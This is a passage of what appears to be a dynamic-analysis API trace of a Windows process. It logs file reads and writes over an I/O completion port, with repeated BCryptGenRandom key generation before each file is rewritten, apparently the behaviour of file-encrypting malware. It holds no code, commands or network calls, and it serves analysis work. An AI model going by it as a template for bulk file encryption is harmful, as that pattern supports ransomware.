lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.956] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.957] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.957] free (_Block=0x3e305b8) [0118.957] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.957] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.957] free (_Block=0x77d8b8) [0118.957] free (_Block=0x2071c20) [0118.957] free (_Block=0x77d7a8) [0118.957] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0118.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.965] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0118.965] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.965] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.965] free (_Block=0x3e305b8) [0118.965] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.965] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.966] free (_Block=0x77d8b8) [0118.966] free (_Block=0x2071c20) [0118.966] free (_Block=0x77d7a8) [0118.966] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.979] CloseHandle (hObject=0x13c0) returned 1 [0118.980] free (_Block=0x3ef0008) [0118.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0118.994] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x31cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.600] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0120.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0120.608] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.608] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.608] free (_Block=0x3e305b8) [0120.608] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.608] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.608] free (_Block=0x77d8b8) [0120.608] free (_Block=0x2071c20) [0120.608] free (_Block=0x77d7a8) [0120.608] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0120.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.620] CloseHandle (hObject=0x308) returned 1 [0120.621] free (_Block=0x1ff1e60) [0120.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.625] CloseHandle (hObject=0x2f4) returned 1 [0120.632] free (_Block=0x3e70008) [0120.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.639] CloseHandle (hObject=0x13c0) returned 1 [0120.639] free (_Block=0x3df0008) [0120.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.648] CloseHandle (hObject=0x340) returned 1 [0120.648] free (_Block=0x3d70450) [0120.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.655] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x375e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.669] CloseHandle (hObject=0x2f4) returned 1 [0120.669] free (_Block=0x1ff1e60) [0120.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.672] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.760] CloseHandle (hObject=0x308) returned 1 [0120.761] free (_Block=0x3df0008) [0120.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.771] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.784] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x44e6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.810] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.820] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0120.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.827] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.853] CloseHandle (hObject=0x340) returned 1 [0120.859] free (_Block=0x3d70450) [0120.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.860] CloseHandle (hObject=0x2f4) returned 1 [0120.862] free (_Block=0x3e70008) [0120.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.946] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0120.965] CloseHandle (hObject=0x3bc) returned 1 [0120.966] free (_Block=0x3df0008) [0120.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.048] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.048] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.049] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.049] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.049] free (_Block=0x3e305b8) [0121.049] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.049] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.050] free (_Block=0x1fa91d0) [0121.050] free (_Block=0x77d7a8) [0121.050] free (_Block=0x1fa90b8) [0121.050] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.051] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.073] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4752, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.089] CloseHandle (hObject=0x2f4) returned 1 [0121.090] free (_Block=0x3df0008) [0121.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.100] CloseHandle (hObject=0x3bc) returned 1 [0121.104] free (_Block=0x1ff1e60) [0121.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.118] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x559a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0121.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.144] CloseHandle (hObject=0x308) returned 1 [0121.145] free (_Block=0x3d70450) [0121.145] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.151] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3632, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0121.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.162] CloseHandle (hObject=0x340) returned 1 [0121.162] free (_Block=0x3e70008) [0121.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.164] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.164] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.164] free (_Block=0x3e305b8) [0121.164] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.165] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0121.165] free (_Block=0x1fa91d0) [0121.165] free (_Block=0x2071c20) [0121.165] free (_Block=0x1fa90b8) [0121.165] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.174] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x227a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.187] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3682, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0121.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.188] CloseHandle (hObject=0x340) returned 1 [0121.188] free (_Block=0x3e70008) [0121.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.224] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x65e6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.226] CloseHandle (hObject=0x2f4) returned 1 [0121.226] free (_Block=0x3df0008) [0121.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.229] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x25c7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0121.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.230] CloseHandle (hObject=0x13c0) returned 1 [0121.231] free (_Block=0x3ef0008) [0121.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0121.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0121.272] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.272] free (_Block=0x3e305b8) [0121.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.272] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.272] free (_Block=0x1fa91d0) [0121.272] free (_Block=0x77d7a8) [0121.272] free (_Block=0x1fa90b8) [0121.272] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0121.275] WriteFile (in: hFile=0x13c0, 